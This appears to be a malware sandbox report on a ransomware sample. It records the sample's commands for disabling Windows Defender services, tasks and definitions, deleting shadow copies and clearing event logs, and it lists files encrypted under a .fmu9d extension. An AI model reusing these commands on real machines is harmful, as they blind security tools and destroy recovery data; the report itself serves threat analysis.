C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/460-55-0x0000000000000000-mapping.dmp
memory/1200-56-0x0000000000000000-mapping.dmp
memory/1412-57-0x0000000000000000-mapping.dmp
memory/1392-58-0x0000000000000000-mapping.dmp
memory/1400-59-0x0000000000000000-mapping.dmp
memory/1040-60-0x0000000000000000-mapping.dmp
memory/688-61-0x0000000000000000-mapping.dmp
memory/1072-62-0x0000000000000000-mapping.dmp
memory/720-63-0x0000000000000000-mapping.dmp
memory/1456-64-0x0000000000000000-mapping.dmp
memory/1136-65-0x0000000000000000-mapping.dmp
memory/1260-66-0x0000000000000000-mapping.dmp
memory/1820-67-0x0000000000000000-mapping.dmp
memory/1660-68-0x0000000000000000-mapping.dmp
memory/608-69-0x0000000000000000-mapping.dmp
memory/1548-70-0x0000000000000000-mapping.dmp
memory/1164-71-0x0000000000000000-mapping.dmp
memory/1844-72-0x0000000000000000-mapping.dmp
memory/1708-73-0x0000000000000000-mapping.dmp
memory/968-74-0x0000000000000000-mapping.dmp
memory/1064-75-0x0000000000000000-mapping.dmp
memory/1988-76-0x0000000000000000-mapping.dmp
memory/888-77-0x0000000000000000-mapping.dmp
memory/2036-78-0x0000000000000000-mapping.dmp
memory/616-79-0x0000000000000000-mapping.dmp
memory/1072-80-0x0000000000000000-mapping.dmp
memory/1144-81-0x0000000000000000-mapping.dmp
memory/656-82-0x0000000000000000-mapping.dmp
memory/1248-83-0x0000000000000000-mapping.dmp
memory/952-84-0x0000000000000000-mapping.dmp
memory/836-85-0x0000000000000000-mapping.dmp
memory/1716-86-0x0000000000000000-mapping.dmp
memory/288-87-0x0000000000000000-mapping.dmp
memory/792-88-0x0000000000000000-mapping.dmp
memory/1924-89-0x0000000000000000-mapping.dmp
memory/1712-90-0x0000000000000000-mapping.dmp
memory/1680-91-0x0000000000000000-mapping.dmp
memory/880-92-0x0000000000000000-mapping.dmp
memory/1156-93-0x0000000000000000-mapping.dmp
memory/1260-94-0x0000000000000000-mapping.dmp
memory/1348-95-0x0000000000000000-mapping.dmp
memory/1508-96-0x0000000000000000-mapping.dmp
memory/572-97-0x0000000000000000-mapping.dmp
memory/1060-98-0x0000000000000000-mapping.dmp
memory/2024-99-0x0000000000000000-mapping.dmp
memory/812-100-0x0000000000000000-mapping.dmp
memory/1808-101-0x0000000000000000-mapping.dmp
memory/992-102-0x0000000000000000-mapping.dmp
memory/2032-103-0x0000000000000000-mapping.dmp
memory/1736-104-0x0000000000000000-mapping.dmp
memory/1604-105-0x0000000000000000-mapping.dmp
memory/432-106-0x0000000000000000-mapping.dmp
memory/1768-107-0x0000000000000000-mapping.dmp
memory/2028-108-0x0000000000000000-mapping.dmp
memory/1332-109-0x0000000000000000-mapping.dmp
memory/996-110-0x0000000000000000-mapping.dmp
memory/1720-111-0x0000000000000000-mapping.dmp
memory/1528-112-0x0000000000000000-mapping.dmp
memory/1800-113-0x0000000000000000-mapping.dmp
memory/1084-114-0x0000000000000000-mapping.dmp
memory/1920-115-0x0000000000000000-mapping.dmp
memory/2064-116-0x0000000000000000-mapping.dmp
memory/2112-117-0x0000000000000000-mapping.dmp
memory/2196-118-0x0000000000000000-mapping.dmp
memory/2252-119-0x0000000076371000-0x0000000076373000-memory.dmp
memory/2252-120-0x0000000002640000-0x000000000328A000-memory.dmp
memory/2252-121-0x0000000002640000-0x000000000328A000-memory.dmp
memory/2252-122-0x0000000002640000-0x000000000328A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 8ca131ef5aa05a74a43e8883d0c9671a |
| SHA1 | 8335d07a953b60386e03c90011cd95b24cf5d40a |
| SHA256 | d34432df10d2131663378f26d14eb8b1e315bcc49beac4cc7fa4d33cd64433bb |
| SHA512 | 76863c19096f5dedffc7cb691b184360ebd485841952f244ab0becb3b3b2dfaf8e9e04379629d6389e8789a4486520918fe8627c78345c560e14bea9bfa0bfb7 |
memory/2332-126-0x0000000002370000-0x0000000002FBA000-memory.dmp
memory/2332-125-0x0000000002370000-0x0000000002FBA000-memory.dmp
memory/2332-127-0x0000000002370000-0x0000000002FBA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 10:58
Reported
2022-01-13 11:04
Platform
win10-en-20211208
Max time kernel
57s
Max time network
153s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u6TustaWNW80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_dRX2kSBd8-I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_jKkhBXu26cc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Gallery.thmx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aubd7EaVH7g0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.png.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_PDMFPp_N5sg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2Uy4j37glBE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesdistinctive.dotx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e-fdEeB6NZQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KLNKfZtaxgc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_O9UWejGBZsg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_p_D2pXOLaPg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_CDZHotFKzhY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TT3l7SEPVbQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vq9hbZ6isos0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp3-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_t_q-H0Fwyuk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_f74xiJwk6J40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial1-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sC6txoINkxM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sG2wwPjKhcs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_vSOQw2a6NtU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_AlqxZ1hwEtk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e1wb2jxfFrM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\security\blacklist.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_8_KuKZUQxuk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_opG2TB2KxRY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2QInFJrgL500.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LcCfXeWreww0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\LASER.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KfR7gcjBHnI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL108.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LhjMpSvU4Mc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\notice.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_xPbG3pzwwC40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_zVSvPvogpvQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\de-DE\iexplore.exe.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_R9OV6-n5LH00.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_fYaD4mX2Jt80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_gzVcIpieRYk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_ooyu-bPKq7o0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_schHjeN7pfw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_9EwQFLOz8Bc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\CAMERA.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Ato2AUXaqpk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aRy6dd9lJmY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Eu6Tbbj7xFg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_jKvcEfP5Gj80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_XbwawN3m78I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Iw_NvNnGh-Y0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_GCCHLIqOR800.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_HHe4TjruLfs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xsl.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_eJXb6MKG-Ak0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u-Lb0TLVjJU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_3ZTgQ4pCBtk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_b7BKT4GfSTk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_5T5Os-4u0Y40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8EN.LEX.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aiL5EAiVNHQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vy4WlpRw8mU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUAI.TTF.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_tR_G96RAVcU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
